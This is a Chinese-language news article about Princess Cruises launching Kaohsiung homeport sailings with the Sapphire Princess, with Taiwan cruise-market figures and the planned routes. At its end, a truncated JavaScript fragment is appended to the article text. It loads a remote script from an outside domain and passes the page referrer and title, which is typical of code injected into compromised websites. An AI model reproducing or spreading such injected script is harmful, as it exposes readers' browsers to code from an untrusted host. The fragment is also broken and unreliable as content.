【特約撰述王麟琴/高雄報導】近年台灣郵輪旅客不斷成長,根據國際郵輪協會CLIA數據預估,2017年可望突破33萬人次。這讓隸屬全球最大嘉年華郵輪集團—公主遊輪國際營運部執行副總裁Tony kaufman相當看好台灣市場,繼基隆港之後,親自來台與高雄港市合作,從10月起,開設高雄母港啟航計畫,可望為南台灣帶入超過5,000萬的觀光效益。

公主遊輪國際營運部執行副總裁Tony(Anthony) Kaufman與公主遊輪台灣行銷總監徐景奇看好台灣市場。

公主遊輪國際營運部執行副總裁Tony(Anthony) Kaufman與公主遊輪台灣行銷總監徐景奇看好台灣市場。

 

隨著國人旅遊模式的改變,不但使郵輪旅遊在台灣興起,也帶動了台灣的觀光發展。光是2016年,公主遊輪在基隆港就帶進了1.5萬名國際旅客,對此,交通部觀光局副局長劉喜臨,也特別感謝公主遊輪對台灣旅遊的貢獻,並且也期待未來能串連亞太區的海上航線,形成新型態的旅遊模式,帶來更多國際郵輪觀光客。

 

為此,公主遊輪更派遣旗下最豪華精緻的藍寶石公主號來台,為南部旅客推出專屬於南台灣市場的郵輪旅程,打造海上百老匯的公主劇院、享受聖殿成人休憩區等特色設施,零距離一覽世界文化及自然景觀文化遺產,更貼心依照南台灣旅客的習慣與需求,加入在地元素,從道地小吃到異國饗宴,為旅客創造難忘回憶。

 

Grand Princess

Grand Princess

繼麗星郵輪宣布3月起,為期三個月以高雄為母港,推出台灣—香港—菲律賓馬尼拉,和佬沃六天五夜的郵輪假期後,藍寶石公主號也將於10月以高雄為母港,推出5條專屬高雄出發的郵輪航線,提供5至6日的旅程,前往沖繩、宮古島、香港及下龍灣。讓南台灣民眾省去往返北高兩市的時間,大幅增加嘉義以南旅客搭乘郵輪出遊的便利性。s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + “;